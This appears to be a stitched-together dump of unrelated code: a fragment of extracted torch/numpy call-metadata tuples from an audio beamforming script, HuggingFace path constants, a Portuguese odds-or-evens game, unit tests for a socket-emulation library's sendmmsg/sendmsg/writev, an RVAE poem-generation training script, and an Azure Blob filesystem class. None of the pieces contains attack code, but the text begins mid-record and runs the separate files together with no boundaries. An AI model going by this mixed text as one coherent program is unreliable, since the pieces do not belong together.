'torch.unsqueeze', 'torch.unsqueeze', (['ref_'], {'dim': '(1)'}), '(ref_, dim=1)\n', (8017, 8030), False, 'import torch\n'), ((8253, 8282), 'torch.unsqueeze', 'torch.unsqueeze', (['perms'], {'dim': '(2)'}), '(perms, dim=2)\n', (8268, 8282), False, 'import torch\n'), ((8431, 8495), 'torch.einsum', 'torch.einsum', (['"""bij,pij->bp"""', '[magnitude_distance, perms_one_hot]'], {}), "('bij,pij->bp', [magnitude_distance, perms_one_hot])\n", (8443, 8495), False, 'import torch\n'), ((8526, 8565), 'torch.argmin', 'torch.argmin', (['batchwise_distance'], {'dim': '(1)'}), '(batchwise_distance, dim=1)\n', (8538, 8565), False, 'import torch\n'), ((21033, 21096), 'torch.argmax', 'torch.argmax', (['perms_one_hot[min_distance_idx[batch_idx]]'], {'dim': '(1)'}), '(perms_one_hot[min_distance_idx[batch_idx]], dim=1)\n', (21045, 21096), False, 'import torch\n'), ((25977, 26000), 'numpy.trace', 'np.trace', (['x[b_idx, ...]'], {}), '(x[b_idx, ...])\n', (25985, 26000), True, 'import numpy as np\n'), ((4978, 5010), 'torch.unsqueeze', 'torch.unsqueeze', (['mix_stft'], {'dim': '(0)'}), '(mix_stft, dim=0)\n', (4993, 5010), False, 'import torch\n'), ((5499, 5544), 'torch.unsqueeze', 'torch.unsqueeze', (['ref_stft_1ch[spk_idx]'], {'dim': '(1)'}), '(ref_stft_1ch[spk_idx], dim=1)\n', (5514, 5544), False, 'import torch\n'), ((7904, 7955), 'torch.sqrt', 'torch.sqrt', (['(s_MISO1_.real ** 2 + s_MISO1_.imag ** 2)'], {}), '(s_MISO1_.real ** 2 + s_MISO1_.imag ** 2)\n', (7914, 7955), False, 'import torch\n'), ((8636, 8699), 'torch.argmax', 'torch.argmax', (['perms_one_hot[min_distance_idx[batch_idx]]'], {'dim': '(1)'}), '(perms_one_hot[min_distance_idx[batch_idx]], dim=1)\n', (8648, 8699), False, 'import torch\n'), ((14926, 14949), 'torch.squeeze', 'torch.squeeze', (['mix_stft'], {}), '(mix_stft)\n', (14939, 14949), False, 'import torch\n'), ((17244, 17259), 'pdb.set_trace', 'pdb.set_trace', ([], {}), '()\n', (17257, 17259), False, 'import pdb\n'), ((5298, 5339), 'torch.unsqueeze', 'torch.unsqueeze', (['ref_stft[spk_idx]'], {'dim': '(0)'}), '(ref_stft[spk_idx], dim=0)\n', (5313, 5339), False, 'import torch\n'), ((7656, 7703), 'torch.cat', 'torch.cat', (['(ref_, ref_stft_1ch[spk_idx])'], {'dim': '(1)'}), '((ref_, ref_stft_1ch[spk_idx]), dim=1)\n', (7665, 7703), False, 'import torch\n'), ((7733, 7795), 'torch.stack', 'torch.stack', (['(s_MISO1, MISO1_stft[spk_idx][:, 0, :, :])'], {'dim': '(1)'}), '((s_MISO1, MISO1_stft[spk_idx][:, 0, :, :]), dim=1)\n', (7744, 7795), False, 'import torch\n'), ((8853, 8911), 'torch.unsqueeze', 'torch.unsqueeze', (['ref_[batch_idx, target_index, ...]'], {'dim': '(0)'}), '(ref_[batch_idx, target_index, ...], dim=0)\n', (8868, 8911), False, 'import torch\n'), ((9641, 9784), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', 'self.predictionType', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), '(observe, source, self.num_spks, self.\n predictionType, self.tapDelay, self.nTap, self.reverb_variance_flowValue)\n', (9668, 9784), False, 'from convolutive_prediction import Apply_ConvolutivePrediction\n'), ((11162, 11295), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', '"""DNN_WPE"""', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), "(observe, source, self.num_spks, 'DNN_WPE', self\n .tapDelay, self.nTap, self.reverb_variance_flowValue)\n", (11189, 11295), False, 'from convolutive_prediction import Apply_ConvolutivePrediction\n'), ((11562, 11691), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', '"""FCP"""', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), "(observe, source, self.num_spks, 'FCP', self.\n tapDelay, self.nTap, self.reverb_variance_flowValue)\n", (11589, 11691), False, 'from convolutive_prediction import Apply_ConvolutivePrediction\n'), ((13797, 13856), 'torch.permute', 'torch.permute', (['DNN_WPE_dereverb_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(DNN_WPE_dereverb_stft[spk_idx], [0, 3, 1, 2])\n', (13810, 13856), False, 'import torch\n'), ((14183, 14238), 'torch.permute', 'torch.permute', (['FCP_dereverb_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(FCP_dereverb_stft[spk_idx], [0, 3, 1, 2])\n', (14196, 14238), False, 'import torch\n'), ((14581, 14618), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (14594, 14618), False, 'import torch\n'), ((15096, 15130), 'torch.squeeze', 'torch.squeeze', (['MISO1_stft[spk_idx]'], {}), '(MISO1_stft[spk_idx])\n', (15109, 15130), False, 'import torch\n'), ((15233, 15270), 'torch.squeeze', 'torch.squeeze', (['dereverb_stft[spk_idx]'], {}), '(dereverb_stft[spk_idx])\n', (15246, 15270), False, 'import torch\n'), ((15387, 15420), 'numpy.transpose', 'np.transpose', (['mix_stft', '[0, 2, 1]'], {}), '(mix_stft, [0, 2, 1])\n', (15399, 15420), True, 'import numpy as np\n'), ((24178, 24226), 'numpy.linalg.norm', 'np.linalg.norm', (['source_steering[b_idx, f_idx, :]'], {}), '(source_steering[b_idx, f_idx, :])\n', (24192, 24226), True, 'import numpy as np\n'), ((26332, 26366), 'numpy.conjugate', 'np.conjugate', (['vector[b_idx, ii, :]'], {}), '(vector[b_idx, ii, :])\n', (26344, 26366), True, 'import numpy as np\n'), ((6502, 6535), 'numpy.expand_dims', 'np.expand_dims', (['MISO1_sig'], {'axis': '(1)'}), '(MISO1_sig, axis=1)\n', (6516, 6535), True, 'import numpy as np\n'), ((9982, 10125), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', 'self.predictionType', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), '(observe, source, self.num_spks, self.\n predictionType, self.tapDelay, self.nTap, self.reverb_variance_flowValue)\n', (10009, 10125), False, 'from convolutive_prediction import Apply_ConvolutivePrediction\n'), ((12548, 12584), 'numpy.expand_dims', 'np.expand_dims', (['Beamform_sig'], {'axis': '(1)'}), '(Beamform_sig, axis=1)\n', (12562, 12584), True, 'import numpy as np\n'), ((13149, 13200), 'torch.permute', 'torch.permute', (['dereverb_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(dereverb_stft[spk_idx], [0, 3, 1, 2])\n', (13162, 13200), False, 'import torch\n'), ((15516, 15562), 'numpy.transpose', 'np.transpose', (['ref_stft_1ch[spk_idx]', '[0, 2, 1]'], {}), '(ref_stft_1ch[spk_idx], [0, 2, 1])\n', (15528, 15562), True, 'import numpy as np\n'), ((15625, 15669), 'numpy.transpose', 'np.transpose', (['MISO1_stft[spk_idx]', '[0, 2, 1]'], {}), '(MISO1_stft[spk_idx], [0, 2, 1])\n', (15637, 15669), True, 'import numpy as np\n'), ((16521, 16576), 'numpy.transpose', 'np.transpose', (['DNN_WPE_Beamform_stft[spk_idx]', '[0, 2, 1]'], {}), '(DNN_WPE_Beamform_stft[spk_idx], [0, 2, 1])\n', (16533, 16576), True, 'import numpy as np\n'), ((16810, 16861), 'numpy.transpose', 'np.transpose', (['FCP_Beamform_stft[spk_idx]', '[0, 2, 1]'], {}), '(FCP_Beamform_stft[spk_idx], [0, 2, 1])\n', (16822, 16861), True, 'import numpy as np\n'), ((16973, 17027), 'numpy.transpose', 'np.transpose', (['Origin_Beamform_stft[spk_idx]', '[0, 2, 1]'], {}), '(Origin_Beamform_stft[spk_idx], [0, 2, 1])\n', (16985, 17027), True, 'import numpy as np\n'), ((10421, 10564), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', 'self.predictionType', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), '(observe, source, self.num_spks, self.\n predictionType, self.tapDelay, self.nTap, self.reverb_variance_flowValue)\n', (10448, 10564), False, 'from convolutive_prediction import Apply_ConvolutivePrediction\n'), ((10969, 11017), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (10982, 11017), False, 'import torch\n'), ((11373, 11421), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (11386, 11421), False, 'import torch\n'), ((13018, 13066), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (13031, 13066), False, 'import torch\n'), ((13714, 13762), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (13727, 13762), False, 'import torch\n'), ((14100, 14148), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (14113, 14148), False, 'import torch\n'), ((14498, 14546), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (14511, 14546), False, 'import torch\n'), ((15781, 15828), 'numpy.transpose', 'np.transpose', (['dereverb_stft[spk_idx]', '[0, 2, 1]'], {}), '(dereverb_stft[spk_idx], [0, 2, 1])\n', (15793, 15828), True, 'import numpy as np\n'), ((15912, 15959), 'numpy.transpose', 'np.transpose', (['Beamform_stft[spk_idx]', '[0, 2, 1]'], {}), '(Beamform_stft[spk_idx], [0, 2, 1])\n', (15924, 15959), True, 'import numpy as np\n'), ((16078, 16125), 'numpy.transpose', 'np.transpose', (['Beamform_stft[spk_idx]', '[0, 2, 1]'], {}), '(Beamform_stft[spk_idx], [0, 2, 1])\n', (16090, 16125), True, 'import numpy as np\n'), ((16393, 16443), 'numpy.squeeze', 'np.squeeze', (['DNN_WPE_dereverb_stft[spk_idx]'], {'axis': '(0)'}), '(DNN_WPE_dereverb_stft[spk_idx], axis=0)\n', (16403, 16443), True, 'import numpy as np\n'), ((16690, 16736), 'numpy.squeeze', 'np.squeeze', (['FCP_dereverb_stft[spk_idx]'], {'axis': '(0)'}), '(FCP_dereverb_stft[spk_idx], axis=0)\n', (16700, 16736), True, 'import numpy as np\n'), ((9515, 9563), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (9528, 9563), False, 'import torch\n'), ((9856, 9904), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (9869, 9904), False, 'import torch\n'), ((10228, 10276), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (10241, 10276), False, 'import torch\n'), ((9378, 9415), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (9391, 9415), False, 'import torch\n'), ((13257, 13294), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (13270, 13294), False, 'import torch\n'), ((11052, 11089), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (11065, 11089), False, 'import torch\n'), ((11456, 11493), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (11469, 11493), False, 'import torch\n'), ((10315, 10352), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (10328, 10352), False, 'import torch\n')] |
import os
TRANSFORMERS = '/home/noone/documents/github/transformers'
TOKENIZERS = '/home/noone/documents/github/tokenizers'
DATASETS = '/home/noone/documents/github/datasets'
MODELS = os.path.join(TRANSFORMERS, 'src/transformers/models')
DEBERTA_V2 = os.path.join(MODELS, 'deberta_v2')
DEBERTA_V3 = os.path.join(MODELS, 'deberta-v3-base')
ENCODER_DECODER = os.path.join(MODELS, 'encoder_decoder')
HUGGINGFACE_HUB = '/home/noone/documents/github/huggingface_hub'
"""
Huggingface Repos Cloned:
- transformers
- tokenizers
= optimum
- datasets
- huggingface_hub
- accelerate
- notebooks
- blog
- huggingface sagemaker snowflake example
- education toolkit
- evaluate
- knockknock
- neuralcoref
- mongoku
- data-measurements-tool
- neural compressor
- allennlp
- pytorch-openai-transformer-lm
- pytorch pretrained bigGAN
- awesome NLP discussion papers
- torchMoji
- naacl_transfer_learning_tutorial
-
""" | [
"os.path.join"
] | [((188, 241), 'os.path.join', 'os.path.join', (['TRANSFORMERS', '"""src/transformers/models"""'], {}), "(TRANSFORMERS, 'src/transformers/models')\n", (200, 241), False, 'import os\n'), ((256, 290), 'os.path.join', 'os.path.join', (['MODELS', '"""deberta_v2"""'], {}), "(MODELS, 'deberta_v2')\n", (268, 290), False, 'import os\n'), ((305, 344), 'os.path.join', 'os.path.join', (['MODELS', '"""deberta-v3-base"""'], {}), "(MODELS, 'deberta-v3-base')\n", (317, 344), False, 'import os\n'), ((364, 403), 'os.path.join', 'os.path.join', (['MODELS', '"""encoder_decoder"""'], {}), "(MODELS, 'encoder_decoder')\n", (376, 403), False, 'import os\n')] |
#Par ou Impar- para qnd o jogador perder e mostra o tanto de vitoria consecutivas
from random import randint
c = 0
while True:
print('\033[1;33m-' * 30)
n = int(input('ESCOLHA UM NÚMERO: '))
e = str(input('PAR OU IMPAR? ')).strip().upper()[0]
print('-' * 30)
j = randint(0, 10)
if e == 'P':
if (n + j) % 2 == 0:
c += 1
print(f'VOCÊ GANHOU!\nEU ESCOLHI {j} E VOCÊ {n}')
elif (n + j) % 2 != 0:
break
elif e == 'I':
if (n + j) % 2 == 0:
break
elif (n + j) % 2 != 0:
c += 1
print(f'VOCÊ GANHOU!\nEU ESCOLHI {j} E VOCÊ {n}')
elif e not in 'PI':
print('\033[1;31mOPÇÃO INVALIDA, TENTE DENOVO!')
print(f'\033[1;31mGAME OVER!\nEU ESCOLHI {j} E VOCÊ {n}\nVOCÊ FEZ UMA SEQUENCIA DE {c} PONTOS!')
| [
"random.randint"
] | [((283, 297), 'random.randint', 'randint', (['(0)', '(10)'], {}), '(0, 10)\n', (290, 297), False, 'from random import randint\n')] |
"""
This file tests that sendmmsg works correctly.
Target files:
- libdesock/src/write.c
"""
import ctypes
import desock
import helper
data = bytes(range(65, 115))
cursor = 0
def _get_data(size):
global cursor
ret = bytes(data[cursor: cursor + size])
assert(len(ret) == size)
cursor += size
return ret
def test_sendmmsg():
fd = desock._debug_instant_fd(0)
assert(desock.sendmmsg(fd, None, 0, 0) == 0)
mmsghdrs = (desock.mmsghdr * 2)()
mmsghdrs[0] = helper.create_mmsghdr(helper.create_msghdr(iov=helper.create_iovec(5, 5, datafunc=_get_data)))
mmsghdrs[1] = helper.create_mmsghdr(helper.create_msghdr(iov=helper.create_iovec(5, 5, datafunc=_get_data)))
with helper.StdoutPipe() as pipe:
assert(desock.sendmmsg(fd, mmsghdrs, 2, 0) == 2)
assert(pipe.read(50) == data)
def test_sendto():
data = ctypes.create_string_buffer(bytes(range(128)))
fd = desock._debug_instant_fd(0)
with helper.StdoutPipe() as pipe:
assert(desock.sendto(fd, data, 128, 0, None, 0) == 128)
assert(pipe.read(128) == data[:128])
def test_sendmsg():
global cursor
cursor = 0
msghdr = helper.create_msghdr(iov=helper.create_iovec(5, 10, datafunc=_get_data))
fd = desock._debug_instant_fd(0)
with helper.StdoutPipe() as pipe:
assert(desock.sendmsg(fd, msghdr, 0) == 50)
assert(pipe.read(50) == data)
def test_writev():
global cursor
cursor = 0
iov = helper.create_iovec(5, 10, datafunc=_get_data)
fd = desock._debug_instant_fd(0)
with helper.StdoutPipe() as pipe:
assert(desock.writev(fd, iov, 5) == 50)
assert(pipe.read(50) == data)
| [
"desock.sendmsg",
"helper.StdoutPipe",
"helper.create_iovec",
"desock.writev",
"desock._debug_instant_fd",
"desock.sendmmsg",
"desock.sendto"
] | [((361, 388), 'desock._debug_instant_fd', 'desock._debug_instant_fd', (['(0)'], {}), '(0)\n', (385, 388), False, 'import desock\n'), ((937, 964), 'desock._debug_instant_fd', 'desock._debug_instant_fd', (['(0)'], {}), '(0)\n', (961, 964), False, 'import desock\n'), ((1274, 1301), 'desock._debug_instant_fd', 'desock._debug_instant_fd', (['(0)'], {}), '(0)\n', (1298, 1301), False, 'import desock\n'), ((1506, 1552), 'helper.create_iovec', 'helper.create_iovec', (['(5)', '(10)'], {'datafunc': '_get_data'}), '(5, 10, datafunc=_get_data)\n', (1525, 1552), False, 'import helper\n'), ((1562, 1589), 'desock._debug_instant_fd', 'desock._debug_instant_fd', (['(0)'], {}), '(0)\n', (1586, 1589), False, 'import desock\n'), ((405, 436), 'desock.sendmmsg', 'desock.sendmmsg', (['fd', 'None', '(0)', '(0)'], {}), '(fd, None, 0, 0)\n', (420, 436), False, 'import desock\n'), ((726, 745), 'helper.StdoutPipe', 'helper.StdoutPipe', ([], {}), '()\n', (743, 745), False, 'import helper\n'), ((979, 998), 'helper.StdoutPipe', 'helper.StdoutPipe', ([], {}), '()\n', (996, 998), False, 'import helper\n'), ((1316, 1335), 'helper.StdoutPipe', 'helper.StdoutPipe', ([], {}), '()\n', (1333, 1335), False, 'import helper\n'), ((1604, 1623), 'helper.StdoutPipe', 'helper.StdoutPipe', ([], {}), '()\n', (1621, 1623), False, 'import helper\n'), ((770, 805), 'desock.sendmmsg', 'desock.sendmmsg', (['fd', 'mmsghdrs', '(2)', '(0)'], {}), '(fd, mmsghdrs, 2, 0)\n', (785, 805), False, 'import desock\n'), ((1023, 1063), 'desock.sendto', 'desock.sendto', (['fd', 'data', '(128)', '(0)', 'None', '(0)'], {}), '(fd, data, 128, 0, None, 0)\n', (1036, 1063), False, 'import desock\n'), ((1217, 1263), 'helper.create_iovec', 'helper.create_iovec', (['(5)', '(10)'], {'datafunc': '_get_data'}), '(5, 10, datafunc=_get_data)\n', (1236, 1263), False, 'import helper\n'), ((1360, 1389), 'desock.sendmsg', 'desock.sendmsg', (['fd', 'msghdr', '(0)'], {}), '(fd, msghdr, 0)\n', (1374, 1389), False, 'import desock\n'), ((1648, 1673), 'desock.writev', 'desock.writev', (['fd', 'iov', '(5)'], {}), '(fd, iov, 5)\n', (1661, 1673), False, 'import desock\n'), ((551, 596), 'helper.create_iovec', 'helper.create_iovec', (['(5)', '(5)'], {'datafunc': '_get_data'}), '(5, 5, datafunc=_get_data)\n', (570, 596), False, 'import helper\n'), ((664, 709), 'helper.create_iovec', 'helper.create_iovec', (['(5)', '(5)'], {'datafunc': '_get_data'}), '(5, 5, datafunc=_get_data)\n', (683, 709), False, 'import helper\n')] |
import argparse
import os
import shutil
import numpy as np
import torch as t
from torch.optim import Adam
from utils.batch_loader import BatchLoader
from utils.parameters import Parameters
from model.rvae_dilated import RVAE_dilated
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='RVAE_dilated')
parser.add_argument('--num-epochs', type=int, default=25000, metavar='ES',
help='num epochs (default: 25000)')
parser.add_argument('--start-epoch', default=0, type=int, metavar='E',
help='manual epoch index (useful on restarts)')
parser.add_argument('--batch-size', type=int, default=45, metavar='BS',
help='batch size (default: 45)')
parser.add_argument('--use-cuda', type=bool, default=True, metavar='CUDA',
help='use cuda (default: True)')
parser.add_argument('--learning-rate', type=float, default=0.0005, metavar='LR',
help='learning rate (default: 0.0005)')
parser.add_argument('--dropout', type=float, default=0.3, metavar='DR',
help='dropout (default: 0.3)')
parser.add_argument('--use-trained', default='', metavar='UT',
help='load pretrained model (default: None)')
parser.add_argument('--ret-result', default='', metavar='CE',
help='ce result path (default: '')')
parser.add_argument('--kld-result', default='', metavar='KLD',
help='ce result path (default: '')')
args = parser.parse_args()
prefix = 'poem'
word_is_char = True
batch_loader = BatchLoader('', prefix, word_is_char)
best_ret = 9999999
is_best = False
if not os.path.exists('data/' + batch_loader.prefix + 'word_embeddings.npy'):
raise FileNotFoundError("word embeddings file was't found")
parameters = Parameters(batch_loader.max_word_len,
batch_loader.max_seq_len,
batch_loader.words_vocab_size,
batch_loader.chars_vocab_size, word_is_char)
rvae = RVAE_dilated(parameters, batch_loader.prefix)
optimizer = Adam(rvae.learnable_parameters(), args.learning_rate)
if args.use_trained:
checkpoint = t.load(args.use_trained)
args.start_epoch = checkpoint['epoch']
best_ret = checkpoint['best_ret']
rvae.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
if args.use_cuda and t.cuda.is_available():
rvae = rvae.cuda()
train_step = rvae.trainer(optimizer, batch_loader)
validate = rvae.validater(batch_loader)
ret_result = []
kld_result = []
for epoch in range(args.start_epoch, args.num_epochs):
train_ret, train_kld, train_kld_coef = train_step(epoch, args.batch_size, args.use_cuda and t.cuda.is_available(), args.dropout)
train_ret = train_ret.data.cpu().numpy()[0]
train_kld = train_kld.data.cpu().numpy()[0]
valid_ret, valid_kld = validate(args.batch_size, args.use_cuda and t.cuda.is_available())
valid_ret = valid_ret.data.cpu().numpy()[0]
valid_kld = valid_kld.data.cpu().numpy()[0]
ret_result += [valid_ret]
kld_result += [valid_kld]
is_best = valid_ret < best_ret
best_ret = min(valid_ret, best_ret)
print('[%s]---TRAIN-ret[%s]kld[%s]------VALID-ret[%s]kld[%s]'%(epoch, train_ret, train_kld, valid_ret, valid_kld))
if epoch != 1 and epoch % 10 == 9:
seed = np.random.normal(size=[1, parameters.latent_variable_size])
sample = rvae.sample(batch_loader, 50, seed, args.use_cuda and t.cuda.is_available(), None, 1)
print('[%s]---SAMPLE: %s'%(epoch, sample))
if epoch != 0 and epoch % 100 == 99:
checkpoint_filename = './data/%strained_%s_RVAE'%(batch_loader.prefix, epoch+1)
t.save({'epoch': epoch+1,
'state_dict': rvae.state_dict(),
'best_ret': best_ret,
'optimizer': optimizer.state_dict()}, checkpoint_filename)
oldest = epoch+1-3*100
oldest_checkpoint_filename = './data/%strained_%s_RVAE'%(batch_loader.prefix, oldest) if oldest>0 else None
if oldest_checkpoint_filename and os.path.isfile(oldest_checkpoint_filename):
os.remove(oldest_checkpoint_filename)
if is_best:
shutil.copyfile(checkpoint_filename, './data/'+batch_loader.prefix+'trained_best_RVAE')
t.save({'epoch': args.num_epochs,
'state_dict': rvae.state_dict(),
'best_ret': best_ret,
'optimizer': optimizer.state_dict()}, './data/'+batch_loader.prefix+'trained_last_RVAE')
np.save(batch_loader.prefix+'ret_result_{}.npy'.format(args.ret_result), np.array(ret_result))
np.save(batch_loader.prefix+'kld_result_npy_{}'.format(args.kld_result), np.array(kld_result))
| [
"numpy.random.normal",
"os.path.exists",
"utils.batch_loader.BatchLoader",
"argparse.ArgumentParser",
"torch.load",
"os.path.isfile",
"numpy.array",
"utils.parameters.Parameters",
"torch.cuda.is_available",
"shutil.copyfile",
"model.rvae_dilated.RVAE_dilated",
"os.remove"
] | [((281, 332), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""RVAE_dilated"""'}), "(description='RVAE_dilated')\n", (304, 332), False, 'import argparse\n'), ((1653, 1690), 'utils.batch_loader.BatchLoader', 'BatchLoader', (['""""""', 'prefix', 'word_is_char'], {}), "('', prefix, word_is_char)\n", (1664, 1690), False, 'from utils.batch_loader import BatchLoader\n'), ((1904, 2047), 'utils.parameters.Parameters', 'Parameters', (['batch_loader.max_word_len', 'batch_loader.max_seq_len', 'batch_loader.words_vocab_size', 'batch_loader.chars_vocab_size', 'word_is_char'], {}), '(batch_loader.max_word_len, batch_loader.max_seq_len,\n batch_loader.words_vocab_size, batch_loader.chars_vocab_size, word_is_char)\n', (1914, 2047), False, 'from utils.parameters import Parameters\n'), ((2140, 2185), 'model.rvae_dilated.RVAE_dilated', 'RVAE_dilated', (['parameters', 'batch_loader.prefix'], {}), '(parameters, batch_loader.prefix)\n', (2152, 2185), False, 'from model.rvae_dilated import RVAE_dilated\n'), ((1747, 1816), 'os.path.exists', 'os.path.exists', (["('data/' + batch_loader.prefix + 'word_embeddings.npy')"], {}), "('data/' + batch_loader.prefix + 'word_embeddings.npy')\n", (1761, 1816), False, 'import os\n'), ((2303, 2327), 'torch.load', 't.load', (['args.use_trained'], {}), '(args.use_trained)\n', (2309, 2327), True, 'import torch as t\n'), ((2564, 2585), 'torch.cuda.is_available', 't.cuda.is_available', ([], {}), '()\n', (2583, 2585), True, 'import torch as t\n'), ((4890, 4910), 'numpy.array', 'np.array', (['ret_result'], {}), '(ret_result)\n', (4898, 4910), True, 'import numpy as np\n'), ((4989, 5009), 'numpy.array', 'np.array', (['kld_result'], {}), '(kld_result)\n', (4997, 5009), True, 'import numpy as np\n'), ((3600, 3659), 'numpy.random.normal', 'np.random.normal', ([], {'size': '[1, parameters.latent_variable_size]'}), '(size=[1, parameters.latent_variable_size])\n', (3616, 3659), True, 'import numpy as np\n'), ((2916, 2937), 'torch.cuda.is_available', 't.cuda.is_available', ([], {}), '()\n', (2935, 2937), True, 'import torch as t\n'), ((3133, 3154), 'torch.cuda.is_available', 't.cuda.is_available', ([], {}), '()\n', (3152, 3154), True, 'import torch as t\n'), ((4364, 4406), 'os.path.isfile', 'os.path.isfile', (['oldest_checkpoint_filename'], {}), '(oldest_checkpoint_filename)\n', (4378, 4406), False, 'import os\n'), ((4424, 4461), 'os.remove', 'os.remove', (['oldest_checkpoint_filename'], {}), '(oldest_checkpoint_filename)\n', (4433, 4461), False, 'import os\n'), ((4502, 4597), 'shutil.copyfile', 'shutil.copyfile', (['checkpoint_filename', "('./data/' + batch_loader.prefix + 'trained_best_RVAE')"], {}), "(checkpoint_filename, './data/' + batch_loader.prefix +\n 'trained_best_RVAE')\n", (4517, 4597), False, 'import shutil\n'), ((3735, 3756), 'torch.cuda.is_available', 't.cuda.is_available', ([], {}), '()\n', (3754, 3756), True, 'import torch as t\n')] |
__author__ = '<NAME>'
from os import path
from azure.storage.blob import BlockBlobService
from flow.core.abstract_filesystem import AbstractFilesystem, splitpath
class AzureBlobFilesystem(AbstractFilesystem):
""" implementation of Azure Page Blob filesystem
https://docs.microsoft.com/en-us/azure/storage/blobs/storage-python-how-to-use-blob-storage#download-and-install-azure-storage-sdk-for-python"""
def __init__(self, logger, context, **kwargs):
super(AzureBlobFilesystem, self).__init__(logger, context, **kwargs)
try:
self.block_blob_service = BlockBlobService(account_name=context.settings['azure_account_name'],
account_key=context.settings['azure_account_key'])
except EnvironmentError as e:
self.logger.error('Azure Credentials are NOT valid. Terminating.', exc_info=True)
raise ValueError(e)
def __del__(self):
pass
def _azure_bucket(self, bucket_name):
if not bucket_name:
bucket_name = self.context.settings['azure_bucket']
return bucket_name
def mkdir(self, uri_path, bucket_name=None, **kwargs):
def _create_folder_file():
folder_key = path.join(root, '{0}_$folder$'.format(folder_name))
if not self.block_blob_service.exists(azure_bucket, folder_key):
self.block_blob_service.create_blob_from_text(azure_bucket, folder_key, '')
azure_bucket = self._azure_bucket(bucket_name)
root = ''
for folder_name in splitpath(uri_path):
root = path.join(root, folder_name)
_create_folder_file()
def rmdir(self, uri_path, bucket_name=None, **kwargs):
azure_bucket = self._azure_bucket(bucket_name)
for key in self.block_blob_service.list_blobs(azure_bucket, prefix='{0}/'.format(uri_path)):
self.block_blob_service.delete_blob(azure_bucket, key)
def rm(self, uri_path, bucket_name=None, **kwargs):
azure_bucket = self._azure_bucket(bucket_name)
self.block_blob_service.delete_blob(azure_bucket, uri_path)
def cp(self, uri_source, uri_target, bucket_name_source=None, bucket_name_target=None, **kwargs):
azure_bucket_source = self._azure_bucket(bucket_name_source)
azure_bucket_target = self._azure_bucket(bucket_name_target)
source_blob_url = self.block_blob_service.make_blob_url(azure_bucket_source, uri_source)
self.block_blob_service.copy_blob(azure_bucket_target, uri_target, source_blob_url)
def mv(self, uri_source, uri_target, bucket_name_source=None, bucket_name_target=None, **kwargs):
self.cp(uri_source, uri_target, bucket_name_source, bucket_name_target, **kwargs)
self.rm(uri_source, bucket_name_source)
def copyToLocal(self, uri_source, uri_target, bucket_name_source=None, **kwargs):
azure_bucket_source = self._azure_bucket(bucket_name_source)
with open(uri_target, 'wb') as file_pointer:
self.block_blob_service.get_blob_to_stream(azure_bucket_source, uri_source, file_pointer)
def copyFromLocal(self, uri_source, uri_target, bucket_name_target=None, **kwargs):
azure_bucket_target = self._azure_bucket(bucket_name_target)
with open(uri_source, 'rb') as file_pointer:
self.block_blob_service.create_blob_from_stream(azure_bucket_target, uri_target, file_pointer)
def exists(self, uri_path, bucket_name=None, exact=False, **kwargs):
azure_bucket = self._azure_bucket(bucket_name)
is_found = self.block_blob_service.exists(azure_bucket, uri_path)
if exact is False and is_found is False:
folder_name = '{0}_$folder$'.format(path.basename(uri_path))
folder_key = path.join(uri_path, folder_name)
is_found = self.block_blob_service.exists(azure_bucket, folder_key)
